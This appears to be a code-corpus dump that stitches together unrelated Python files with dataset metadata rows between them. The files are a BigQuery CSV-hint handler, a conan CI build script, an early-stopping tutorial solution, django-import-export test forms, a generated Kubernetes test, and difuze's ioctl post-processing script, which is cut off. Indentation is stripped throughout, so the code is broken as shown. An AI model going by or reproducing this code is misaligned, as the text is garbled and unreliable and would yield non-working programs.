# to split the data in its raw, binary state. The default
# value is a double-quote ('"'). If your data does not contain
# quoted sections, set the property value to an empty
# string. If your data contains quoted newline characters, you
# must also set the allowQuotedNewlines property to
# true.
#
# @default "
# I tried a few combinations and found that when you leave quote_character as the default
#
# * Fields quoted with "" are loaded without the surrounding quotes in the
# string
# * "" becomes " in a quoted field
# * "" stays "" in a non-quoted field
# * nonnumeric quoting works fine
# * full quoting works fine
if hints.quoting is None:
config.quote_character = ''
elif hints.quoting == 'all' or hints.quoting == 'minimal' or hints.quoting == 'nonnumeric':
# allow_quoted_newlines: Allow quoted data containing newline
# characters (CSV only).
config.allow_quoted_newlines = True
assert isinstance(hints.quotechar, str)
config.quote_character = hints.quotechar
if hints.doublequote:
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'doublequote', hints)
else:
_assert_never(hints.quoting)
quiet_remove(unhandled_hints, 'quoting')
quiet_remove(unhandled_hints, 'quotechar')
quiet_remove(unhandled_hints, 'doublequote')
# No mention of escaping in BigQuery documentation, and in
# practice backslashes come through without being interpreted.
if hints.escape is None:
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'escape', hints)
quiet_remove(unhandled_hints, 'escape')
# skip_leading_rows: Number of rows to skip when reading data (CSV only).
if hints.header_row:
config.skip_leading_rows = 1
else:
config.skip_leading_rows = 0
quiet_remove(unhandled_hints, 'header-row')
# "When you load CSV or JSON data, values in DATE columns must
# use the dash (-) separator and the date must be in the
# following format: YYYY-MM-DD (year-month-day)."
if hints.dateformat == 'YYYY-MM-DD':
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'dateformat', hints)
quiet_remove(unhandled_hints, 'dateformat')
# "When you load JSON or CSV data, values in TIMESTAMP columns
# must use a dash (-) separator for the date portion of the
# timestamp, and the date must be in the following format:
# YYYY-MM-DD (year-month-day). The hh:mm:ss
# (hour-minute-second) portion of the timestamp must use a
# colon (:) separator."
#
#
# To test, log into BigQuery web console and try SQL like this
# (assumption is that the same timestamp parser is used during
# CSV loads)
#
# select TIMESTAMP("2000-01-02 16:34:56.789012US/Eastern") as a;
#
# Tests performed and result displayed on console query:
#
# DATE:
# * 01-02-2019 (rejected):
# * 01/02/19 (rejected):
# * 2019-01-01 (accepted): 2019-01-01
# DATETIME:
# * 2019-01-01 1:00pm (rejected):
# * 2019-01-01 1:00:00pm (rejected)
# * 2019-01-01 1:00PM (rejected):
# * 2019-01-01 13:00 (rejected):
# * 2019-01-01 13:00:00 (accepted): 2019-01-01T13:00:00
# * 2019-01-01 1:00pm US/Eastern (rejected):
# * 2019-01-01 1:00:00pm US/Eastern (rejected):
# * 2019-01-01 13:00:00 US/Eastern (rejected):
# * 2019-01-01 13:00:00 EST (rejected):
# * 1997-12-17 07:37:16-08 (rejected)
# * 2019-01-01T13:00:00 (accepted): 2019-01-01T13:00:00
#
# TIME:
# * 1:00pm (rejected):
# * 1:00:00pm (rejected):
# * 13:00 (rejected):
# * 13:00:00 (accepted): 13:00:00
# * 1:00pm US/Eastern (rejected):
# * 1:00pm EST (rejected):
# * 07:37:16-08 (rejected):
#
# TIMESTAMP ("Required format is YYYY-MM-DD
# HH:MM[:SS[.SSSSSS]]", which is BS, as it doesn't specify the
# timezone format):
#
# * 2019-01-01 1:00pm (rejected):
# * 2019-01-01 1:00:00pm (rejected)
# * 2019-01-01 1:00PM (rejected):
# * 2019-01-01 13:00 (rejected):
# * 2019-01-01 13:00:00 (accepted): 2019-01-01T13:00:00
# * 2019-01-01 1:00pm US/Eastern (rejected):
# * 2019-01-01 1:00:00pm US/Eastern (rejected):
# * 2019-01-01 13:00:00 US/Eastern (rejected):
# * 2019-01-01 13:00:00 EST (rejected):
# * 1997-12-17 07:37:16-08 (accepted): 1997-12-17 15:37:16 UTC
# * 2019-01-01T13:00:00-08 (accepted): 2019-01-01 21:00:00 UTC
# * 2000-01-02 16:34:56.789012+0000 (rejected)
# * 2000-01-02 16:34:56.789012+00:00 (accepted)
# * 2000-01-02 16:34:56.789012EST (rejected)
# * 2000-01-02 16:34:56.789012US/Eastern (rejected)
# * 2000-01-02 16:34:56.789012UTC (accepted): 2000-01-02 16:34:56.789012 UTC
# * 2000-01-02 16:34:56.789012 UTC (accepted: 2000-01-02 16:34:56.789012 UTC
#
# https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#examples
#
# https://stackoverflow.com/questions/47466296/bigquery-datetime-format-csv-to-bigquery-yyyy-mm-dd-hhmmss-ssssss
#
# BigQuery supports exactly one format of ingesting timestamps
# with timezones (what they call 'TIMESTAMP' they call timestamps
# without timezones 'DATETIME'.
#
# That format they accept is ISO 8601, which sounds all nice and
# standardy. Usable timestamps look like 2000-01-02
# 16:34:56.789012+00:00.
# Cool cool. The only issue is that Python's strftime doesn't
# actually provide a way to add the ':' in the timezone
# offset. The only timezone offset code, %z, does not provide the
# colon. Other implementations (GNU libc) offers the %:z option,
# but that doesn't exist in Python and thus in Pandas.
#
# So if you're using Python to export timestamps with timezones,
# you should probably use the `YYYY-MM-DD HH24:MI:SS` format and
# express them in UTC.
#
# https://stackoverflow.com/questions/44836581/does-python-time-strftime-process-timezone-options-correctly-for-rfc-3339
# https://stackoverflow.com/questions/28729212/pandas-save-date-in-iso-format
#
if hints.datetimeformat in ['YYYY-MM-DD HH24:MI:SS', 'YYYY-MM-DD HH:MI:SS']:
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'datetimeformat', hints)
quiet_remove(unhandled_hints, 'datetimeformat')
if hints.datetimeformattz in ['YYYY-MM-DD HH:MI:SSOF',
'YYYY-MM-DD HH24:MI:SSOF',
'YYYY-MM-DD HH:MI:SS']:
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'datetimeformattz', hints)
quiet_remove(unhandled_hints, 'datetimeformattz')
if hints.timeonlyformat in ['HH24:MI:SS', 'HH:MI:SS']:
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'timeonlyformat', hints)
quiet_remove(unhandled_hints, 'timeonlyformat')
# No options to change this. Tested with unix newlines, dos
# newlines and mac newlines and all were understood.:
if hints.record_terminator in ['\n', '\r\n', '\r', None]:
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'record-terminator', hints)
quiet_remove(unhandled_hints, 'record-terminator')
# No way to flag compression, but tested uncompressed, with
# gzip and works great. .bz2 gives "400 Unsupported
# compression type". Not sure about .lzo, but pandas can't
# handle it regardless, so doubt it's handled.
if hints.compression is None or hints.compression == 'GZIP':
pass
else:
cant_handle_hint(fail_if_cant_handle_hint, 'compression', hints)
quiet_remove(unhandled_hints, 'compression')
| 42.014006 | 125 | 0.688246 |
b6a324f2c022792d45551fdca822f6e706869066 | 862 | py | Python | .ci/build.py | clayne/gtirb | df9bf69537c36136d40fbff98588df37b8c5875f | [
"MIT"
] | null | null | null | .ci/build.py | clayne/gtirb | df9bf69537c36136d40fbff98588df37b8c5875f | [
"MIT"
] | null | null | null | .ci/build.py | clayne/gtirb | df9bf69537c36136d40fbff98588df37b8c5875f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import subprocess
import sys
import conanfile
def run_conan(args):
cmd = ["conan"] + args
print("running: %s" % " ".join(cmd))
sys.stdout.flush()
subprocess.check_call(cmd)
def build(argv):
props = conanfile.Properties()
run_conan(["create", ".", props.conan_ref] + argv)
archived_channels = props.archived_channels
if props.conan_channel in archived_channels:
run_conan(
["upload", props.conan_recipe, "--all", "--remote", "gitlab"]
)
else:
print(
"Conan channel not archived. Update archived_branches in "
"conanfile.py to get archival."
)
print("archived channels: ")
print(*archived_channels, sep=", ")
print("channel built: " + props.conan_channel)
if __name__ == "__main__":
build(sys.argv[1:])
| 24.628571 | 73 | 0.611369 |
36176a4369f6963b7bf80bfb16357a82b77c14c5 | 1,678 | py | Python | tutorials/W1D5_Regularization/solutions/W1D5_Tutorial1_Solution_23bb8e1a.py | carsen-stringer/course-content-dl | 27749aec56a3d2a43b3890483675ad0338a2680f | [
"CC-BY-4.0",
"BSD-3-Clause"
] | null | null | null | tutorials/W1D5_Regularization/solutions/W1D5_Tutorial1_Solution_23bb8e1a.py | carsen-stringer/course-content-dl | 27749aec56a3d2a43b3890483675ad0338a2680f | [
"CC-BY-4.0",
"BSD-3-Clause"
] | null | null | null | tutorials/W1D5_Regularization/solutions/W1D5_Tutorial1_Solution_23bb8e1a.py | carsen-stringer/course-content-dl | 27749aec56a3d2a43b3890483675ad0338a2680f | [
"CC-BY-4.0",
"BSD-3-Clause"
] | null | null | null | def early_stopping_main(args, model, train_loader, val_loader):
device = args['device']
model = model.to(device)
optimizer = optim.SGD(model.parameters(),
lr=args['lr'],
momentum=args['momentum'])
best_acc = 0.0
best_epoch = 0
# Number of successive epochs that you want to wait before stopping training process
patience = 20
# Keps track of number of epochs during which the val_acc was less than best_acc
wait = 0
val_acc_list, train_acc_list = [], []
for epoch in tqdm(range(args['epochs'])):
# train the model
train(args, model, train_loader, optimizer)
# calculate training accuracy
train_acc = test(model, train_loader, device=device)
# calculate validation accuracy
val_acc = test(model, val_loader, device=device)
if (val_acc > best_acc):
best_acc = val_acc
best_epoch = epoch
best_model = copy.deepcopy(model)
wait = 0
else:
wait += 1
if (wait > patience):
print(f'early stopped on epoch: {epoch}')
break
train_acc_list.append(train_acc)
val_acc_list.append(val_acc)
return val_acc_list, train_acc_list, best_model, best_epoch
# Set the arguments
args = {
'epochs': 200,
'lr': 5e-4,
'momentum': 0.99,
'device': DEVICE
}
# Initialize the model
set_seed(seed=SEED)
model = AnimalNet()
## Uncomment to test
val_acc_earlystop, train_acc_earlystop, _, best_epoch = early_stopping_main(args, model, train_loader, val_loader)
print(f'Maximum Validation Accuracy is reached at epoch: {best_epoch:2d}')
with plt.xkcd():
early_stop_plot(train_acc_earlystop, val_acc_earlystop, best_epoch) | 26.634921 | 114 | 0.681168 |
253d8b9c58af2cb1bb477071172967e4472a9d69 | 540 | py | Python | tests/core/forms.py | marksweb/django-import-export | 26977ed44ff8f2c9769b14bc69f0b41f3524da6d | [
"BSD-2-Clause"
] | 2,020 | 2015-05-20T02:41:40.000Z | 2022-03-31T14:37:50.000Z | tests/core/forms.py | marksweb/django-import-export | 26977ed44ff8f2c9769b14bc69f0b41f3524da6d | [
"BSD-2-Clause"
] | 1,195 | 2015-05-19T15:28:11.000Z | 2022-03-31T16:56:16.000Z | tests/core/forms.py | marksweb/django-import-export | 26977ed44ff8f2c9769b14bc69f0b41f3524da6d | [
"BSD-2-Clause"
] | 680 | 2015-05-27T16:54:17.000Z | 2022-03-31T07:56:09.000Z | from django import forms
from import_export.forms import ConfirmImportForm, ImportForm
from .models import Author
class AuthorFormMixin(forms.Form):
author = forms.ModelChoiceField(queryset=Author.objects.all(),
required=True)
class CustomImportForm(AuthorFormMixin, ImportForm):
"""Customized ImportForm, with author field required"""
pass
class CustomConfirmImportForm(AuthorFormMixin, ConfirmImportForm):
"""Customized ConfirmImportForm, with author field required"""
pass
| 25.714286 | 66 | 0.735185 |
f5dfffa725c9ba0ee03eba0f70794b0e30ed402c | 2,379 | py | Python | kubernetes/test/test_com_coreos_monitoring_v1_prometheus_spec_probe_selector.py | mariusgheorghies/python | 68ac7e168963d8b5a81dc493b1973d29e903a15b | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_com_coreos_monitoring_v1_prometheus_spec_probe_selector.py | mariusgheorghies/python | 68ac7e168963d8b5a81dc493b1973d29e903a15b | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_com_coreos_monitoring_v1_prometheus_spec_probe_selector.py | mariusgheorghies/python | 68ac7e168963d8b5a81dc493b1973d29e903a15b | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.20.7
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import kubernetes.client
from kubernetes.client.models.com_coreos_monitoring_v1_prometheus_spec_probe_selector import ComCoreosMonitoringV1PrometheusSpecProbeSelector # noqa: E501
from kubernetes.client.rest import ApiException
class TestComCoreosMonitoringV1PrometheusSpecProbeSelector(unittest.TestCase):
"""ComCoreosMonitoringV1PrometheusSpecProbeSelector unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test ComCoreosMonitoringV1PrometheusSpecProbeSelector
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = kubernetes.client.models.com_coreos_monitoring_v1_prometheus_spec_probe_selector.ComCoreosMonitoringV1PrometheusSpecProbeSelector() # noqa: E501
if include_optional :
return ComCoreosMonitoringV1PrometheusSpecProbeSelector(
match_expressions = [
kubernetes.client.models.com_coreos_monitoring_v1_alertmanager_spec_affinity_pod_affinity_pod_affinity_term_label_selector_match_expressions.com_coreos_monitoring_v1_Alertmanager_spec_affinity_podAffinity_podAffinityTerm_labelSelector_matchExpressions(
key = '0',
operator = '0',
values = [
'0'
], )
],
match_labels = {
'key' : '0'
}
)
else :
return ComCoreosMonitoringV1PrometheusSpecProbeSelector(
)
def testComCoreosMonitoringV1PrometheusSpecProbeSelector(self):
"""Test ComCoreosMonitoringV1PrometheusSpecProbeSelector"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| 37.761905 | 272 | 0.691047 |
2f041687f12514d436d8dca0080a7a268ffff4a1 | 16,727 | py | Python | helper_scripts/post_processing/run_all.py | chubbymaggie/difuze | f5074953014eec98954c4b50cb0db33ebd00d29e | [
"BSD-2-Clause"
] | 21 | 2018-05-28T03:08:40.000Z | 2021-12-16T09:50:48.000Z | helper_scripts/post_processing/run_all.py | JackBro/difuze | 964c8051a3bc6b04319cdc715303bb57e9e453d1 | [
"BSD-2-Clause"
] | 4 | 2019-04-23T10:14:14.000Z | 2020-05-07T08:41:00.000Z | helper_scripts/post_processing/run_all.py | JackBro/difuze | 964c8051a3bc6b04319cdc715303bb57e9e453d1 | [
"BSD-2-Clause"
] | 6 | 2018-10-25T05:04:09.000Z | 2020-12-01T08:28:25.000Z | import sys
import os
import glob
import subprocess
import md5
import argparse
# Sub-directory names used by the post-processing pipeline.
# NOTE(review): the visible code here does not show where these are rooted;
# presumably they are resolved relative to a results/working directory.
out_dir = 'out/'
xml_dir = 'xml/'
generics_dir = 'generics/'
commons_dir = 'common/'
class Struct(object):
    """Ordered container for the member values of a parsed C struct.

    Values are kept in insertion order and can be read back by index.
    """

    def __init__(self):
        # Member values, in the order they were added.
        self.vals = []

    def __getitem__(self, index):
        """Return the member value stored at position *index*."""
        return self.vals[index]

    def add_val(self, value):
        """Append *value* as the next member of this struct."""
        self.vals.append(value)
class Union(object):
    """Ordered bag of member-type strings collected for an anonymous union."""
    def __init__(self):
        self.vals = []
    def __getitem__(self, idx):
        # Indexable like a list of the collected member descriptions.
        return self.vals[idx]
    def add_val(self, val):
        self.vals.append(val)
def my_listdir(path):
    """Return full paths of the entries directly under *path* (glob-based,
    so dotfiles are skipped)."""
    pattern = os.path.join(path, '*')
    return glob.glob(pattern)
def get_devpath(fname):
    """Try to recover the device node path recorded in an ioctl analysis
    output file; return None when the name finder marker is present or the
    file looks malformed."""
    marker = 'Device name finder'
    hit = 'Device Name'
    i = 0
    f = open(fname, 'r')
    data = f.read()
    f.close()
    lines = data.splitlines()
    for line in lines:
        if marker in line:
            # Marker means the analysis could not determine a name.
            return None
        elif hit in line:
            # Name is the last whitespace-separated token on the hit line;
            # the device type is the last token of the following line.
            name = line[line.rfind(' ')+1::]
            type_line = lines[i+1]
            dev_type = type_line[type_line.rfind(' ')+1::]
            if dev_type == 'proc':
                # NOTE(review): this yields 'proc<name>' with no separator --
                # presumably intended to be a /proc path; confirm upstream.
                dev_loc = dev_type
            else:
                dev_loc = '/dev/'
            dev_loc += name
            return dev_loc
        i += 1
    # Neither marker nor name line found: drop into the debugger for triage.
    print "Something is weird about the ioctl out file.."
    import ipdb;ipdb.set_trace()
    return None
def get_struct_name(line):
    """Extract the struct name between the first '.' and the ' =' of a
    type-description line such as 'struct.my_struct = ...'."""
    start = line.find('.') + 1
    end = line.find('=') - 1
    return line[start:end]
def get_cmd_val(line):
    """Return the absolute integer command value found between the first
    and the last ':' of *line*; 'BR' lines carry two comma-separated values."""
    raw = line[line.find(':') + 1:line.rfind(':')]
    if 'BR' in line:
        left, right = raw.split(',')
        # TODO: Check with machiry
        raw = left if left == right else right
    try:
        return abs(int(raw))
    except ValueError:
        print("Bad val_str: %s" % raw)
        import ipdb;ipdb.set_trace()
        sys.exit(1)
def emit_records_popping_cmd(popd_cmd, cmd_stack, records, global_type):
    """When a cmd value is popped from the switch-nesting stack, make sure it
    has a [cmd, type] record: reuse the nearest parent's records, or fall back
    to the file-wide global type."""
    # check if we have a record for our cmd, if so, just return
    for record in records:
        cmd = record[0]
        if popd_cmd == cmd:
            return
    # if not, check our parents records
    parent_had_record = False
    for parent in cmd_stack[:-1:]:
        parent_records = []
        parent_had_record = False
        for record in records:
            cmd = record[0]
            arg = record[1]
            if cmd == parent:
                parent_had_record = True
                # Inherit the parent's argument type for the popped cmd.
                # NOTE(review): this appends to `records` while iterating it;
                # the appended entry has cmd == popd_cmd so it normally does
                # not re-match, but confirm popd_cmd can never equal parent.
                new_record = [popd_cmd, arg]
                records.append(new_record)
        if parent_had_record:
            break
    # last hope, check global type
    if parent_had_record == False:
        if global_type is None:
            return
        print '[*] Using global type! %s' % global_type
        new_record = [popd_cmd,global_type]
        records.append(new_record)
    return
def emit_records_saw_type(cmd_stack, cmd_type, records):
    """Record that the command currently on top of *cmd_stack* uses *cmd_type*."""
    top_cmd = cmd_stack[-1]
    records.append([top_cmd, cmd_type])
    return
# get preprocessed files. Also serves as a precheck..
def get_pre_procs(lines):
    """Return [main_preprocessed_file, *additional files] parsed out of the
    'ALL PREPROCESSED FILES' section, or -1 when the section is missing or
    malformed."""
    # first get the start idx
    idx = 0
    for line in lines:
        if 'ALL PREPROCESSED FILES' in line:
            break
        idx += 1
    if idx == len(lines):
        print "[!] Couldn't find preprocessed files!"
        return -1
    # The line just before the section header names the main file.
    if 'Preprocessed' not in lines[idx-1]:
        return -1
    main_pre_proc = lines[idx-1][lines[idx-1].find(":")+1::]
    additional_pre_procs = []
    # Everything after the header (minus the two trailing lines) is a path.
    for line in lines[idx+1:-2:]:
        additional_pre_procs.append(line[line.find(":")+1::])
    # De-duplicate the main file, then put it first.
    if main_pre_proc in additional_pre_procs:
        additional_pre_procs.remove(main_pre_proc)
    to_ret = [main_pre_proc]
    to_ret.extend(additional_pre_procs)
    return to_ret
def algo(fname):
    """Parse one ioctl analysis output file.

    Walks the START/END cmd markers (a stack, since switches nest) and the
    STARTTYPE/ENDTYPE markers, pairing each command value with the argument
    type that was copied from userspace.

    Returns (records, pre_proc_files, ioctl_name) where records is a list of
    [cmd, type] pairs; on precheck failure records/pre_proc_files are empty.
    """
    records = []
    cmd_stack = []       # nesting of cmd values currently open (START seen, END pending)
    global_type = None   # type seen before any cmd (copy_from_user above the switch)
    cur_cmd = None
    cur_type = None
    in_type = False      # between STARTTYPE and ENDTYPE
    in_anon_type = False # collecting members of an anonymous struct/union
    f = open(fname, 'r')
    data = f.read()
    f.close()
    lines = data.splitlines()
    print '[+] Running on file %s' % fname
    # Line 1 is 'something: <ioctl handler name>'.
    name_line = lines[1]
    ioctl_name = name_line[name_line.find(': ')+2::]
    print '[+] ioctl name: %s' % ioctl_name
    pre_proc_files = get_pre_procs(lines)
    if pre_proc_files == -1:
        print "[*] Failed precheck"
        return records, [], ioctl_name
    # probably an uncessary sanity check
    if len(pre_proc_files) == 0:
        print "[*] Failed to find preproc files"
        import ipdb;ipdb.set_trace()
    for line in lines:
        if 'Found Cmd' in line:
            cmd_val = get_cmd_val(line)
            if 'START' in line:
                cmd_stack.append(cmd_val)
                cur_cmd = cmd_val
            elif 'END' in line:
                # the cmd val that's END'ing should always be the top guy on the stack
                if cmd_val != cmd_stack[-1]:
                    print "Fucked up cmd stack state!"
                    import ipdb;ipdb.set_trace()
                popd_cmd = cmd_stack.pop()
                emit_records_popping_cmd(popd_cmd, cmd_stack, records, global_type)
                cur_cmd = None
        elif 'STARTTYPE' in line:
            in_type = True
        # just saw a type, so time to emit a record
        elif 'ENDTYPE' in line:
            # THIS IS POSSIBLE -- IF THE COPY_FROM_USER IS ABOVE THE SWITCH.
            if cur_cmd is None:
                # push
                # Fuck....global anon
                print 'Setting global type'
                global_type = cur_type
                in_type = False
                cur_type = None
                continue
            if cur_type is None:
                print 'wtf. cur_type is None..'
                import ipdb;ipdb.set_trace()
            emit_records_saw_type(cmd_stack, cur_type, records)
            in_type = False
            cur_type = None
        elif in_type:
            # check if the type is a fuggin anon guy
            if 'anon' in line and 'STARTELEMENTS' in line:
                in_anon_type = True
                if 'struct' in line:
                    cur_type = Struct()
                elif 'union' in line:
                    cur_type = Union()
                else:
                    print "Unknown anon type! %s" % line
                    import ipdb;ipdb.set_trace()
            elif 'anon' in line and 'ENDELEMENTS' in line:
                in_anon_type = False
                pass
            elif in_anon_type:
                # Member line of the anonymous aggregate being collected.
                cur_type.add_val(line.strip())
            else:
                # Plain named type: keep the raw line as the type description.
                cur_type = line
    return records, pre_proc_files, ioctl_name
def get_relevant_preproc(struct_name, pre_procs, folder_name):
    """Find which preprocessed file defines *struct_name* (by grepping) and
    return the path of its parsed _out.xml, creating it if needed.
    Returns -1 when no preprocessed file mentions the struct."""
    found = False
    # a horrible hack..
    for pre in pre_procs:
        stuff = subprocess.Popen(['grep', struct_name, pre], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        stdout, stderr = stuff.communicate()
        if len(stdout) > 0:
            found = True
            break
    if found == False:
        return -1
    # `pre` is the matching path, e.g.:
    # /home/jay/ioctl_stuff/llvm_out_new/drivers/hisi/tzdriver/tc_client_driver.preprocessed
    pre_fname = pre[pre.rfind('/')+1:pre.rfind('.'):]
    # check if we've parsed the found file
    path = out_dir + folder_name + '/' + xml_dir
    abs_path = os.path.abspath(path)
    potential_outfile = abs_path + '/' + pre_fname + '_out.xml'
    if os.path.exists(potential_outfile):
        return potential_outfile
    else:
        print '[@] Setting up a new out file: %s' % pre_fname
        return setup_files(pre, folder_name)
def setup_files(pre_proc, folder_name):
    """Run the c2xml -> pre_parse -> parse pipeline on *pre_proc* and return
    the resulting _out.xml path; results are cached in the commons directory
    keyed by an md5 of the source path."""
    out = out_dir + folder_name + '/' + xml_dir
    # yeah yeah, this is pretty stupid but it's a simple unique check since there may be filename collisions
    md5_sum = md5.new(pre_proc).digest().encode('hex')
    output_base_name = pre_proc[pre_proc.rfind('/')+1:pre_proc.rfind('.'):]
    # make sure the xml file exists
    xml_out_path = os.path.abspath(out)
    if os.path.exists(xml_out_path) == False:
        os.mkdir(xml_out_path)
    # first check the commons file
    if os.path.exists(out_dir + '/' + commons_dir + output_base_name + '_' + md5_sum + '_out.xml') == True:
        print '[+] Found a match in commons!'
        return out_dir + commons_dir + output_base_name + '_' + md5_sum + '_out.xml'
    # create the c2xml file
    c2xml_cmd = './c2xml ' + pre_proc + ' > ' + out + output_base_name + '.xml'
    print c2xml_cmd
    os.system(c2xml_cmd)
    # pre_parse the file
    pre_parse_cmd = 'python pre_parse.py ' + out + output_base_name + '.xml'
    print pre_parse_cmd
    os.system(pre_parse_cmd)
    # parse the file
    parse_cmd = 'python parse.py ' + out + output_base_name + '_fixup.xml > ' + out + output_base_name + '_out.xml'
    print parse_cmd
    os.system(parse_cmd)
    out_file = out + output_base_name + '_out.xml'
    # cp it to the commons guy
    cp_cmd = 'cp ' + out_file + ' ' + out_dir + '/' + commons_dir + output_base_name + '_' + md5_sum + '_out.xml'
    print cp_cmd
    os.system(cp_cmd)
    return out_file
def pre_check(records):
    """Return True if at least one record carries a handleable argument type.

    Handleable means a string type description that either references a
    struct or is one of the generic integer widths (i16/i32/i64); anonymous
    Struct/Union objects are skipped here.
    """
    # Idiomatic any() over a manual loop returning True/False literals.
    return any(
        isinstance(record[1], str)
        and ('struct' in record[1] or record[1] in ('i16', 'i32', 'i64'))
        for record in records
    )
def is_array(cmd_type):
    """Return True if *cmd_type* looks like an LLVM array type, e.g. '[4 x i32]'."""
    # Return the boolean expression directly instead of if/else with literals.
    return '[' in cmd_type and 'x' in cmd_type and ']' in cmd_type
def process_records(records, pre_procs, folder_name, device_name, dev_num):
    """Generate one post-parsed XML file per [cmd, type] record by shelling
    out to post_parse.py; struct, generic-int and array types are supported,
    anonymous Struct/Union objects are skipped for now."""
    i = 0
    for record in records:
        cmd = record[0]
        cmd_type = record[1]
        file_name = folder_name + '_' + str(i) + '_' + str(cmd) + device_name.replace('/','-') + '.xml'
        # just accept normal structs for now
        if type(cmd_type) is str:
            # normal structs
            if 'struct' in cmd_type:
                struct_name = get_struct_name(cmd_type)
                out_file = get_relevant_preproc(struct_name, pre_procs, folder_name)
                if out_file == -1:
                    print "[&] Couldn't find relevant out file!"
                    import ipdb;ipdb.set_trace()
                # post_parse command
                post_parse_cmd = 'python post_parse.py ' + out_file + ' ' + device_name + ' ' + str(cmd) + ' ' + struct_name + ' > ' + out_dir + folder_name + '/' + file_name
                full_out_file = os.path.abspath(out_dir + folder_name + '/' + file_name)
                print post_parse_cmd
                os.system(post_parse_cmd)
                # check if we fucked up
                if os.path.getsize(full_out_file) == 0:
                    print '[-] Created 0 size file! Removing!'
                    os.remove(full_out_file)
            # generics
            elif cmd_type in ['i16', 'i32', 'i64']:
                # Use the pre-made generic template for plain integer args.
                struct_name = 'foo'
                post_parse_cmd = 'python post_parse.py ' + generics_dir + 'generic_' + cmd_type + '.xml ' + device_name + ' ' + str(cmd) + ' ' + struct_name + ' > ' + out_dir + folder_name + '/' + file_name
                full_out_file = os.path.abspath(out_dir + folder_name + '/' + file_name)
                print post_parse_cmd
                os.system(post_parse_cmd)
            # array
            elif is_array(cmd_type):
                struct_name = 'foo'
                file_name = folder_name + '_' + str(i) + '_arr' + device_name.replace('/','-') + '.xml'
                post_parse_cmd = 'python post_parse.py ' + generics_dir + 'generic_arr.xml ' + device_name + ' ' + str(cmd) + ' ' + struct_name + ' > ' + out_dir + folder_name + '/' + file_name
                full_out_file = os.path.abspath(out_dir + folder_name + '/' + file_name)
                print post_parse_cmd
                os.system(post_parse_cmd)
        # TODO: we need to create a custom header with either a union or struct
        else:
            pass
        i+=1
def main():
    """Entry point: parse every ioctl analysis file, filter to those with
    usable [cmd, type] records, then interactively (or automatically,
    depending on -n) resolve device names and emit per-cmd XML files."""
    global out_dir
    parser = argparse.ArgumentParser(description="run_all options")
    parser.add_argument('-f', type=str, help="Filename of the ioctl analysis output OR the entire output directory created by the system", required=True)
    parser.add_argument('-o', type=str, help="Output directory to store the results. If this directory does not exist it will be created", required=True)
    parser.add_argument('-n', type=str, help="Specify devname options. You can choose manual (specify every name manually), auto (skip anything that we don't identify a name for), or hybrid (if we detected a name, we use it, else we ask the user)", default="manual", choices=['manual', 'auto', 'hybrid'])
    parser.add_argument('-m', type=int, help="Enable multi-device output most ioctls only have one applicable device node, but some may have multiple. (0 to disable)", default=1)
    args = parser.parse_args()
    path = args.f
    out_dir = args.o
    name_mode = args.n
    multi_dev = args.m
    # Normalize the out dir to a trailing-slash form and create it if needed.
    if out_dir[-1] != '/':
        out_dir = out_dir + '/'
    if os.path.exists(os.path.abspath(out_dir)) == False:
        print "[+] Creating your out directory for you"
        os.mkdir(os.path.abspath(out_dir))
    # Accept either a single analysis file or a directory of them.
    if os.path.isfile(path) == False:
        files = my_listdir(path)
    else:
        files = [path]
    if os.path.exists(out_dir + commons_dir) == False:
        os.mkdir(out_dir + commons_dir)
    print "[+] About to run on %d ioctl info file(s)" % len(files)
    processed_files = []
    algo_dict = {}
    # Pass 1: parse every file and keep only the usable ones.
    for fname in files:
        if fname == "common":
            continue
        if os.path.isdir(fname):
            print "[^] Hit the V4L2 guy!"
            continue
        # Really we just need the preprocessed file at this point
        records, pre_proc_files, ioctl_name = algo(fname)
        if len(records) > 0:
            cwd = os.path.abspath('.')
            # check if device path exists
            if os.path.exists(cwd + '/' + out_dir + ioctl_name) == False:
                os.mkdir(out_dir + ioctl_name)
            else:
                print "[!] Skipping %s. out file exists" % ioctl_name
                continue
            # run a pre_check to make sure we have struct or generic args
            if pre_check(records) == False:
                print '[!] Skipping %s. No struct or generic args.' % ioctl_name
                continue
            # if we're running in full automode, make sure the device name has been recovered
            if name_mode == 'auto':
                dev_path = get_devpath(fname)
                if dev_path == None:
                    print '[!] Skipping %s. Name was not recovered and running in auto mode.' % ioctl_name
                    continue
            # setup files. This is done once per device/ioctl
            for record in records:
                struct_type = record[1]
                # nothing to process for generics
                if 'struct' not in struct_type:
                    continue
                get_relevant_preproc(get_struct_name(struct_type), pre_proc_files, ioctl_name)
            #out_file = setup_files(pre_proc_files[0], ioctl_name)
            processed_files.append(fname)
            algo_dict[fname] = (records, pre_proc_files, ioctl_name)
        else:
            print '[!] Skipping %s. No commands found' % ioctl_name
    # pass #2
    for fname in processed_files:
        # parse the output
        records = algo_dict[fname][0]
        pre_proc_files = algo_dict[fname][1]
        ioctl_name = algo_dict[fname][2]
        # good to go
        print '[#] Operating on: %s' % fname
        num_devs = 1
        if multi_dev:
            print "Multiple Devices? (y/n):"
            multi_dev = raw_input("> ")
            if multi_dev == 'y':
                num = raw_input("num devices: ")
                num_devs = int(num)
        for x in range(num_devs):
            # if we're running in manual mode, ask for the device name regardless
            if name_mode == 'manual':
                print "Please enter a device name:"
                device_name = raw_input("> ")
            else:
                # if we're in auto mode and we've reached here, the name must exist
                # so no need to distinguish between auto and hybrid
                device_name = get_devpath(fname)
                if device_name == None:
